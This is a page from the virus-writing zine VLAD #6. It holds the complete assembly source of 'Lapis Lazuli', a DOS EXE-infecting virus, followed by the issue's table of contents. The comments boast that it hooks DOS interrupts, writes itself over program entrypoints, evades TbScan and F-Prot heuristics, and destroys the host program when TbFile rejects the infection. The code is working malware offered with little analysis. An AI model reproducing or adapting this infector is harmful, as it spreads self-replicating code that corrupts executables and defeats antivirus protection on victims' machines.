Virus Labs & Distribution
VLAD #6 - Lapis Lazuli

; Lapis Lazuli, EXE infector extraordinaire by Rhincewind [Vlad]
; Lapis Lazuli can infect certain EXE files without modifying the header. 
; This is accomplished by overwriting the entrypoint with viruscode, 
; and saving what was there to the end of the EXE file without updating 
; the imagelength in the header, rendering the original code an internal 
; overlay. The loader places the virus in the IVT, opens argv[0] and 
; restores the code.
; The original program is not hindered by this virus, save for a few bytes
; less stackspace and one open file to be closed by DOS termination
; proceedings.
; TbScan heuristics are evaded except the 'i' flag it indicates a file with
; internal overlays with. TbClean's recovery bombs out, in both regular
; and tracing mode. And as an added bonus, when infection is rejected
; using TbFile, the program is destroyed. Way to go.
; F-Prot heuristically detects a virus in the dropper, but not in victims.

                .model tiny
                org 100h
virlen          equ (endvirus-start)
virlenpara      equ (endvirus-start+15)/16
                push es
                push cs
                xor dx,dx
                mov es,dx
                call $+3
get_delta:      mov di, 200h
                pop si
                sub si, offset get_delta-100h
                mov cx, (endvirus-start)
                pop ds
                mov word ptr ds:[si+_ss-100h],ss
                rep movsb
                mov si, 84h
                mov ax,cx
                mov ds,dx
                cmp word ptr ds:[si+2],ax
                jz dont_hook
                xchg si,di
                mov ax, offset int21+100h
dont_hook:      pop ds
                push ds
                mov es, word ptr ds:[2ch]
                mov ax,cx
                mov di,ax
find_zero_zero: scasw
                jz found
                dec di
                jmp find_zero_zero
                db '[Lapis-Lazuli], Rhince/VLAD'
found:          scasw
                push es
                pop ds
                mov dx,di
                mov ax, 3d00h
                int 21h
                jnc argv_0_open
                mov ax, 4cffh
                int 21h
argv_0_open:    xchg ax,bx
                mov ax, 4202h
                dec cx
                mov dx, -virlen
                int 21h
                pop es
                push cs
                pop ds
                push cs
                call delta_2
delta_2:        pop si
                sub si, offset delta_2-100h
                push si
                mov dx,si
                mov ax, 0ea90h
                push ax
                mov ax, 1f06h
                push ax
                mov ax, 21cdh
                push ax
                mov ah, 3fh
                mov cx, virlen
                mov word ptr ds:[si+_sp-100h],sp
                jmp $+2
                db 0eah
_sp             dw 0
_ss             dw 0
int21:          push ax
                sub ax, 4b00h
                jz execute
                jmp end_handler
execute:        push bx
                push cx
                push dx
                push si
                push di
                push bp
                push ds
                push es
                mov ax, 3d02h
                int 21h
                jnc file_okay
                jmp bail
file_okay:      mov bx, 5700h
                xchg ax,bx
                int 21h
                push cx
                push dx
                push cs
                pop ds
                mov ah, 3fh
                mov cx, 0ah
                mov dx, offset buf+100h
                int 21h
                xor cx,ax
                jnz go_close_file
                mov si,cx
                mov di,dx
                add word ptr [di], -'ZM' ;aren't I clever.
                jnz go_close_file
                mov ax, 4200h
                int 21h
                push bx
                mov ah, 48h
                mov bx, word ptr [di+8]
                cmp bx, virlenpara
                jae larger
                mov bx, virlenpara
larger:         int 21h
                pop bx
                jnc dont_close_file
go_close_file:  jmp close_file
dont_close_file:push ax
                mov cx, word ptr ds:[di+8]
                shl cx,4
                pop ds
                mov ah, 3fh
                int 21h
                xor cx,ax
                jnz go_close_file
                push bx
                add cx, word ptr ds:[si+6]
                mov di, 16
                mov ax, word ptr ds:[si+16h]
                xor dx,dx
                imul di
                add ax, word ptr ds:[si+14h]
                adc dx,si
                mov bx,ax
                mov bp,dx
                or cx,cx
                jz no_reloc
                mov si, word ptr ds:[si+18h]
check_item:     push bp        
                mov ax, word ptr ds:[si+2]
                xor dx,dx
                mul di
                add ax, word ptr ds:[si]
                adc dx, 0
                sub bp,dx
                jnz next_item
                sub ax,bx
                js next_item
                cmp ax, virlen
                ja next_item
                pop bp
                pop bx
                jmp abort
next_item:      lodsw
                pop bp
                loop check_item
no_reloc:       mov si,cx
                mov dx,bx
                add cx,bp
                mov ax, word ptr ds:[si+8]
                shl ax,4
                add dx,ax
                adc cx,si
                pop bx
                push cx
                push dx
                mov ax, 4200h
                int 21h
                mov ah, 3fh
                call dx_zero
                cmp word ptr ds:[si],0e06h
                jz bail_amidst_operations
                xor cx,ax
                jz read_okay
                pop ax
                pop ax
                jmp close_file
dx_zero:        cwd
cx_virlen:      mov cx, virlen
_int21:         int 21h
read_okay:      mov ax, 4202h
                int 21h
len_okay:       mov ah, 40h
                call dx_zero
                mov ax, 4200h
                pop dx
                pop cx
                int 21h
                push ds
                push cs
                pop ds
                mov ah, 40h
                mov dx, 200h
                call cx_virlen
                pop ds
abort:          push ds   
                pop es
                mov ah, 49h
                int 21h
close_file:     pop ax
                mov dx, 5701h
                pop cx
                xchg ax,dx
                int 21h
                mov ah, 3eh         
                int 21h
bail:           pop es   
                pop ds
                pop bp
                pop di
                pop si
                pop dx
                pop cx
                pop bx
end_handler:    pop ax
                db 0eah
int21offset     equ $
int21seg        equ $+2
buf             equ $+4
                dw 20cdh
                db (endvirus-start-2) dup (90h)
                end start


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


ARTICLE.2_2       IBM-AV
ARTICLE.2_3       MIME Disasm
ARTICLE.2_4       Dark Fiber Tunneling
ARTICLE.2_5       Bait Detection
ARTICLE.2_6       MCB Stealth


Win95 Intro
ARTICLE.3_2       Win95 tute
ARTICLE.3_3       PE header format
ARTICLE.3_4       Bizatch
ARTICLE.3_5       The Boza Situation
ARTICLE.3_6       Bizatch News
ARTICLE.3_7       What's Next ?


Virus Descriptions
ARTICLE.4_2       Gilgamesh
ARTICLE.4_3       VIP
ARTICLE.4_4       SVL 1.2
ARTICLE.4_6       nimd00d3
ARTICLE.4_7       386 Virus


CLME Disasm
ARTICLE.5_2       Timber Wolf
ARTICLE.5_3       Serrelinda
ARTICLE.5_4       Insert v1.7
ARTICLE.5_5       Backwards
ARTICLE.5_6       TraceVir
ARTICLE.5_7       Lapis Lazuli

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